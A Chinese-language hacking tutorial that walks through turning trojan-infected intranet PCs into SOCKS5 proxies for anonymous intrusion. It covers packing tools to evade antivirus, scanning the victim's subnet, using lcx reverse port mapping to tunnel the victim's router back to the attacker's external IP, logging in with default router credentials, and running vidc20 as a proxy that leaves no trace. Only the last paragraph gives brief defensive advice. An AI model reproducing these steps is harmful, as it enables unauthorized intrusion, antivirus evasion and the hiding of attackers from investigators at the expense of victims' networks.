話說在掛馬得到大量肉雞以后,眾黑友可能都在想如何利用手中的這些戰利品。有人喜歡偷窺人家的隱私,有的人可能就會用木馬的鍵盤記錄盜取人家的QQ密碼,還有的人可能要盜取人家的寬帶上網帳號充Q幣。可大家有沒有想到過將內網中的這些肉雞作成SOCKS5服務器呢?這樣的話,我們以后入侵就可以用這些肉雞作跳板,黑人家也會安全的多了。有人說內網中作SOCKS5服務器不可能,即使作成了也無法利用,好,今天我就將我的一些實踐經驗寫出來與大家共享,沒什么技術含量,大家交流一下,如果大家有更好的方法,還請不吝賜教喲!
首先介紹一下使用的工具,lcx.exe 這是一個反向連接的內網端口映射工具,VIDC20.exe也是一個端口映射工具,不過它也有代理服務器的功能,支持http/socks4/socks5代理,支持代理驗證,支持udp代理,支持二級代理;還有S掃描器,這個只有一個可執行文件,小巧方便,掃端口最合適了。這些工具在網上都有下載,在作代理服務之前,我們需要先作一下免殺,因為大部分殺毒軟件是殺lcx.exe和S掃描器的,如果不作免殺,那一上傳就可能被殺毒軟件給殺掉,如圖1:
圖1
像這種強悍的卡巴,在命令行下是沒有辦法中止的,所以只能作免殺了,其他的殺毒軟件在命令行下可以中止,不過需要一些技巧,因為它們都有線程保護,用常規的方法是中止不了的。我曾經在命令行下干掉過瑞星,只是方法比較繁瑣,所以就不在這里演示了。至於免殺方法嘛,只要簡單的加下殼就可以過關了,據我實驗,先加個北斗3.5,再加aspack 2.12,之后再加北斗3.5,這樣處理后絕大部分殺軟件就不殺這兩個程序了,呵呵。簡單吧,殺毒軟件也是會區別對待的,如果是一些流行木馬,加這三重殼是不能免殺的,對於一些不太重要的黑客工具,殺毒軟件就會顯得相對寬松的多了。我們就是鑽的殺毒軟件的這個空子,如果是加了三重殼也過不了殺毒軟件,那就不要怕麻煩將它們的特征碼給修改掉,就可以過殺毒軟件了,修改的方法網上有許多動畫,大家可以自己找找,我的PCSHARE馬就是這樣作的,過卡巴,瑞星、江民、瑞星、金山、諾頓、趨勢等殺毒軟件很輕松,也可以輕松過各種查馬工具,這就是我修改特征碼后加了三重殼作成的,一個超強的工具。呵呵。有些跑題了,言歸正傳。
工具准備完備后,下面開始作代理了。首先打開你的木馬客戶端程序,將上面的這些工具上傳到內網中的肉雞上,就放在WINDOWS目錄里吧,文件名嘛,最好改一下,免得引起對方注意。打開對方的命令符,鍵入命令:ipconfig /all查看一下肉雞的IP地址,如:192.168.0.2,得到這個本機及網關的IP地址以后,我們就可以用S掃描器對同它同一網段的IP地址進行掃描,看這台肉雞的網關是什么類型的。S掃描器相信大家都會用了吧。
命令行:s-jk tcp 192.168.0.1 192.168.0.255 80,23,3389,1433,139,445 20
這個s-jk是我加三重殼免殺后的S掃描器,這條命令在整個網段中掃描開放139 3389 1433 80 23端口的主機,呵呵,這是為滲透內部網絡作准備,也許有很重要的信息出現呢。哈哈。掃描結果如下圖2:
圖2
經過掃描發現這台肉雞的網關開放80號端口,這說明這台網關一定是台路由器。那怎樣登錄進它的路由器呢?大家都知道寬帶路由器在外網中是不能登錄的,只能由它的內部網絡登錄,難道要進肉雞的屏幕控制,用肉雞的IE登錄?非也,這樣很容易暴露,再說肉雞上的管理員也許現在正在電腦前工作,你是根本沒有辦法進行控制的,下面在自己的電腦上打開命令提示符,命令:lcx -listen 21 8000 再回到肉雞的CMD下,命令:lcx -slave 218.57.179.152 21 192.168.0.1 80 解釋一下:218.57.179.152是我的外網IP,這樣就將肉雞的寬帶路由器的80端口映射到了我的電腦的21端上了,我連接本機的8000端口就可以了。如圖3:
圖3
下一步就要打開IE,地址欄中鍵入:http://127.0.0.1:8000回車后,盼望已久的並且很熟悉的登錄界面出現了。這正是寬帶路由器的登錄界面,只不過這不是我的寬帶路由器,而是另一個局域網的寬帶路由器,我熟練的鍵入的默認用戶名及密碼,admin admin,確定后成功登錄了。如圖4、圖5。
圖4
圖5
接下來的工作簡直就是輕車熟路了,設置一個虛擬服務器指向這台肉雞,端口設置成了個陌生的端口,不要設置成8080,因為寬帶路由器要使用這個端口,它是不允許設置成這個端口的,我設置的是2233,保存后,我們再回到肉雞的命令行下,命令:vidc20 -d -p 2233 這個命令的意思就是以控制台的方式啟動vidc20.exe這個程序,開2233服務端口提供代理服務。這台肉雞已經開始提供SOCK5服務了,並且路由器上的映射也已經正常工作,我們要作的就是打開SOCK5客戶端程序,設置一下SOCKS5服務器的IP地址及端口,也就是這台肉雞的外網IP。我們將IE的圖標拖到SocksCap32的圖標上創建了一個新快捷方式,這樣以后我們登錄到ASP馬時就可以雙擊SocksCap32中的IE進行登錄了。如果你覺得不放心,可以登錄www.123cha.com,查看一下IP,IP地址顯示的是你的肉雞的IP,使用這種代理比使用匿名的HTTP代理還要安全的多,因為給你提供代理的是台個人電腦,並且IP不固定,在一個局域網內部,沒有一些監控軟件記錄任何的連接,並且這台個人電腦重啟后vidc20.exe並不在運行,可以說是毫無痕跡,這樣即使有人追查你的話,也只能查到你肉雞的IP為止,再想繼續追查就不太容易了。
有人說如果管理員把寬帶路由器的密碼改掉了,那不是沒得玩了,我隨機挑選了五個局域網進行測試,全部是默認口令,看來設置默認口令的概率還是滿高的。我分析了一下原因:一、可能是寬帶路由器只能由內網連接,管理員對其安全性認識不足。二、內網中的電腦用戶都是菜鳥,不需要作安全設置。三、管理員懈怠,沒把它當回事。說實話我的寬帶路由器也是設置的默認口令,為什么沒有改掉呢?我覺得我應該屬於第二種情況吧,內網中全部是菜鳥用戶,所以根本必要修改掉,這樣就暴露了一個安全問題,一旦內網中的電腦中了木馬,入侵者就有可能獲得你的寬帶帳號,用你的寬帶帳號刷Q幣、刷業務;還可能登錄你的ISP將你的寬帶帳號給修改掉,讓你上不了網了。如果入侵者拿你作跳板,他作了壞事由你背黑鍋,那豈不是更加冤枉。所以,大家一定對內網的安全問題提高警惕。該打的補丁打上,該修改的默認口令給修改掉,這樣就可以抵御大多數初級的入侵者的攻擊了。但要想絕對安全,那是不可能的,這個世界上沒有絕對的安全。